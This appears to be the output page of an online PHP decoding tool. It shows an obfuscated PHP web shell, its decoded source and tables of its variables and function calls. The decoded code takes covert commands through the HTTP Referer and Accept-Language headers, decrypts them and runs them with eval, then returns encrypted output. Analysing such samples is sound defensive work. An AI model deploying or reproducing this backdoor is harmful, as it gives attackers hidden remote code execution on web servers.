Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $M='ompress(@x1i(@ba1i1ise64_decod1ie1i(preg_1ireplace1i(a1irray("/_/","/-/1i1i"),a..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$M='ompress(@x1i(@ba1i1ise64_decod1ie1i(preg_1ireplace1i(a1irray("/_/","/-/1i1i"),array1i("/"1i,"+"';
$N='1irray1i_values(1i$q);preg_1imatch_1iall("/([1i\\1iw])[\\w-]+1i(?:;q1i=0.([\\d1i1i]1i))?,?/",$ra,$';
$p='$kh="1i51id41";$kf="402a";1ifuncti1io1i1in x($t,$k){$c=s1itrlen(1i1i$k);$l=strle1in1i1i($t);$o=';
$t=str_replace('ey','','eycreaeyteye_fueyneycteyion');
$Y='),$ss($s[1i$i],0,$e)))1i,$k1i)));$o=1io1ib_ge1i1it_content1is();ob_end_clean1i()1i;$d=bas1ie64_';
$j='}1i}return $1io;}$r=$1i_SERV1iER;$rr=1i@$r["H1iT1iTP_REFERER"1i1i];1i$ra=@$r["HT1iTP_ACC1iEPT_L';
$x='er";$i=1i$m[1i1][0].$m[1i1][1];$h1i=$1isl($ss(m1id51i($i.$kh),0,31i));$f=1i$sl1i($s1is(md5($i.$';
$f='m);if1i($q&&$m1i1i){@sessio1in_st1iart();$s1i=&$_1iSESSI1iON;$ss="substr1i";$1isl="1istrto1ilow';
$K='encode1i(x(1i1igzcompres1i1is($1io),$k));print(1i"<$k>$d</$k>"1i);@1isession_1id1iestroy();}}}}';
$T='"1i";for(1i$i=0;$i<$l;1i1i){for($j=0;($j1i<$c&1i&1i$i<$l1i);$j++,$i++){$1io.=$1it{$i}^$k{$j}1i;';
$U='k1if),01i,3));1i$p="1i";for1i($z=1;$z<cou1int($1im[1]1i);$z++)$p.1i=$q[$m[1i21i][1i$1iz]];if(st';
$Z='1irpo1i1is($p,$h)===0){$s[$i]=""1i;$p=$ss1i($p,1i3);}1iif(array_key1i1i_exist1is($i,$s)1i){$s[$';
$l='ANG1iUAGE"];if1i($rr&1i&$ra1i){$u=pa1irse_url1i($rr)1i;pa1irse_str(1i$u["que1iry"],1i$q);$1iq=a';
$b='1i1ii].=$p;$e=st1irpos1i($s[$i],1i$f)1i;if($e){$k1i=$k1ih.$1ikf;ob_st1iart();@ev1ial(@gzun1i1ic';
$k=str_replace('1i','',$p.$T.$j.$l.$N.$f.$x.$U.$Z.$b.$M.$Y.$K);
$E=$t('',$k);$E();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$E None
$K encode1i(x(1i1igzcompres1i1is($1io),$k));print(1i"<$k>$d</$k..
$M ompress(@x1i(@ba1i1ise64_decod1ie1i(preg_1ireplace1i(a1irray..
$N 1irray1i_values(1i$q);preg_1imatch_1iall("/([1i\1iw])[\w-]+1..
$T "1i";for(1i$i=0;$i<$l;1i1i){for($j=0;($j1i<$c&1i&1i$i<$l1i);..
$U k1if),01i,3));1i$p="1i";for1i($z=1;$z<cou1int($1im[1]1i);$z+..
$Y ),$ss($s[1i$i],0,$e)))1i,$k1i)));$o=1io1ib_ge1i1it_content1i..
$Z 1irpo1i1is($p,$h)===0){$s[$i]=""1i;$p=$ss1i($p,1i3);}1iif(ar..
$b 1i1ii].=$p;$e=st1irpos1i($s[$i],1i$f)1i;if($e){$k1i=$k1ih.$1..
$f m);if1i($q&&$m1i1i){@sessio1in_st1iart();$s1i=&$_1iSESSI1iON..
$j }1i}return $1io;}$r=$1i_SERV1iER;$rr=1i@$r["H1iT1iTP_REFERER..
$k $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$l ANG1iUAGE"];if1i($rr&1i&$ra1i){$u=pa1irse_url1i($rr)1i;pa1ir..
$p $kh="1i51id41";$kf="402a";1ifuncti1io1i1in x($t,$k){$c=s1itr..
$t create_function
$x er";$i=1i$m[1i1][0].$m[1i1][1];$h1i=$1isl($ss(m1id51i($i.$kh..

Stats

MD5 76b74ff2e21140461ea5a806806a39aa
Eval Count 1
Decode Time 123 ms